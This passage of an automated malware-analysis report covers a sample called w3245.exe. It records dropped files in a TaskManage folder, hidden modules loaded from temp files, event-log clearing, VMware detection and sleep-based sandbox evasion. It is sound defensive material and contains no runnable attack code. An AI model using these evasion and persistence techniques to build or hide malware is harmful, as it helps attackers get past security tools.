Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3FA6AA push EF3FEFD4h; iretd 3_2_6B3FA6B1
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3F9CD8 pushad ; iretd 3_2_6B3F9CE6
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3EB658 push ecx; ret 3_2_6B3EB66B
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4C3801 push ecx; ret 3_2_6B4C3814
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4C3D95 push ecx; ret 3_2_6B4C3DA8
Source: msvcr100.dll.1.drStatic PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.1.drStatic PE information: section name: .text entropy: 6.9340411158815725
Source: msvcr100.dll.2.drStatic PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.2.drStatic PE information: section name: .text entropy: 6.9340411158815725
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtGui4.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\Fondue.dllJump to dropped file
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\hsiywoxwiypiajJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\eykunyxpxybnsaJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtNetwork4.dllJump to dropped file
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\StarBurn.dllJump to dropped file
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\msvcr100.dllJump to dropped file
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtCore4.dllJump to dropped file
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to dropped file
Source: C:\Users\user\Desktop\w3245.exeFile created: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtGui4.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\Fondue.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtNetwork4.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\StarBurn.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\msvcr100.dllJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeFile created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\QtCore4.dllJump to dropped file
Source: C:\Users\user\Desktop\w3245.exeFile created: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\hsiywoxwiypiajJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\eykunyxpxybnsaJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB43AA1 _StartService_@12,lstrlenW,GlobalAlloc,WideCharToMultiByte,StartServiceA,MultiByteToWideChar,GlobalFree,1_2_5BB43AA1
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868

Hooking and other Techniques for Hiding and Protection

barindex
Found hidden mapped module (file has been removed from disk)
Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\HSIYWOXWIYPIAJ
Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\EYKUNYXPXYBNSA
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3DE09 _ClearEventLog_@8,SetLastError,newMultiByteFromWideChar,ClearEventLogA,GlobalFree,1_2_5BB3DE09
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42A3DD GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,3_2_6B42A3DD

Malware Analysis System Evasion

barindex
Switches to a custom stack to bypass stack traces
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BA37C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BA37C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6BA37945
Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6BA33B54
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: _EnumServicesStatus_@32,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,EnumServicesStatusA,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,1_2_5BB42F59
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeDropped PE file which has not been started: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\Fondue.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hsiywoxwiypiajJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eykunyxpxybnsaJump to dropped file
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeEvaded block: after key decision
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeEvaded block: after key decision
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeEvasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\user\Desktop\w3245.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeAPI coverage: 4.3 %
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe TID: 7364Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 6092Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 6092Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 7736Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 7736Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0093FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0093FF61h0_2_0093FEC6
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0093FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0093FF5Ah0_2_0093FEC6
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CBFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00CBFF61h1_2_00CBFEC6
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CBFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00CBFF5Ah1_2_00CBFEC6
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00903CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_00903CC4
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00944440 FindFirstFileW,FindClose,0_2_00944440
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00919B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_00919B43
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CC4440 FindFirstFileW,FindClose,1_2_00CC4440
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C99B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,1_2_00C99B43
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C83CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,1_2_00C83CC4
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3D32E _FindFirstFileEx_@24,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3D32E
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3D43A _FindFirstFile_@8,SetLastError,memset,newMultiByteFromWideChar,FindFirstFileA,MultiByteToWideChar,MultiByteToWideChar,GlobalFree,1_2_5BB3D43A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,3_2_6B42C8FD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B43088A _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B43088A
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,3_2_6B42CC23
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B430CBB _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B430CBB
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3F81A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B3F81A1
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42E0BD _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,3_2_6B42E0BD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42DBC0 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,3_2_6B42DBC0
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42F9DD _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42F9DD
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42FF0E _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42FF0E
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42F169 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42F169
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B43110C _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B43110C
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42D687 _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,3_2_6B42D687
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B42F593 _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6B42F593
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3AFDD _GetLogicalDriveStrings_@8,SetLastError,newMultiByteFromWideCharSize,GetLogicalDriveStringsA,ConvertMultiSZNameToW,GlobalFree,1_2_5BB3AFDD
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_009497A5 VirtualQuery,GetSystemInfo,0_2_009497A5
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: VMware
Source: RescueCDBurner.exe, 00000002.00000002.1749723448.000000006CA3F000.00000008.00000001.01000000.0000000B.sdmpBinary or memory string: l.?AVQEmulationPaintEngine@@0/:l
Source: RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
Source: RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000002.00000003.1729318882.000000000A469000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [ed'ee.?AVQEmulationPaintEngine@@0/
Source: RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
Source: RescueCDBurner.exe, 00000003.00000002.1807012629.000000006B33F000.00000008.00000001.01000000.00000017.sdmpBinary or memory string: k.?AVQEmulationPaintEngine@@0/
Source: RescueCDBurner.exe, 0000000A.00000002.2073070792.000000006B99F000.00000008.00000001.01000000.00000017.sdmpBinary or memory string: k.?AVQEmulationPaintEngine@@0/0k
Source: RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
Source: RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
Source: RescueCDBurner.exe, 0000000A.00000002.2068057935.0000000009BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
Source: RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: <&version=&md5=&newsize=&registercode=&registertime=&langStr=&fname=&lname=&email=&activecode=action=wbrb\\.\PhysicalDrive0VMwareb71710ea1f7bf1b2
Source: RescueCDBurner.exe, 00000002.00000003.1729318882.000000000A469000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1749723448.000000006CA3F000.00000008.00000001.01000000.0000000B.sdmp, RescueCDBurner.exe, 00000003.00000002.1807012629.000000006B33F000.00000008.00000001.01000000.00000017.sdmp, RescueCDBurner.exe, 0000000A.00000002.2073070792.000000006B99F000.00000008.00000001.01000000.00000017.sdmpBinary or memory string: .?AVQEmulationPaintEngine@@
Source: C:\Users\user\Desktop\w3245.exeAPI call chain: ExitProcess graph end node
